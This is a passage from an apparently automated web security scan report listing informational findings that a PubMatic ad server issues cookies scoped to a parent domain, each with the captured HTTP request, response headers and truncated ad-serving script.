Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:55 GMT
Content-Length: 1935
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:55 GMT; path=/
Set-Cookie: pubfreq_27331_23103_21811428=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:55 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:55 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.161. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A35&ranreq=0.421427555847913&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38484872&rk1=72091245&rk2=1316239534.984&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:09 GMT
Content-Length: 1831
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:09 GMT; path=/
Set-Cookie: _curtime=1316221449; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:14:09 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1536825855=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:09 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

11.162. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A22&ranreq=0.9928095163777471&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:55 GMT
Content-Length: 1863
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:55 GMT; path=/
Set-Cookie: pubfreq_27331_23101_488413314=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:55 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:55 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.163. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23102&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A42&ranreq=0.620290007442236&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:16 GMT
Content-Length: 1938
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:16 GMT; path=/
Set-Cookie: pubfreq_27331_23102_1915562687=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:16 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:07:16 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.164. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A7%3A6&ranreq=0.7310515600256622&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:40 GMT
Content-Length: 1221
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:40 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1821068659=136-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:40 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.165. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23102&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A2&ranreq=0.9849869161844254&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:03:36 GMT
Content-Length: 1939
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:03:36 GMT; path=/
Set-Cookie: pubfreq_27331_23102_1835717243=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:43:36 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:03:36 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.166. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A5&ranreq=0.6880893425550312&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:39 GMT
Content-Length: 1310
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:39 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1628028529=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:39 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.167. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A36&ranreq=0.6413934300653636&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71482072&rk1=45911150&rk2=1316239536.305&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:10 GMT
Content-Length: 1306
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:10 GMT; path=/
Set-Cookie: pubfreq_27331_22455_2082359010=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:10 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.168. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A34&ranreq=0.4114131892565638&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:08 GMT
Content-Length: 1862
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:08 GMT; path=/
Set-Cookie: pubfreq_27331_22454_1191711468=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:08 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:08 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.169. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A44&ranreq=0.1980840740725398&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=29230852&rk1=58438691&rk2=1316239663.676&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
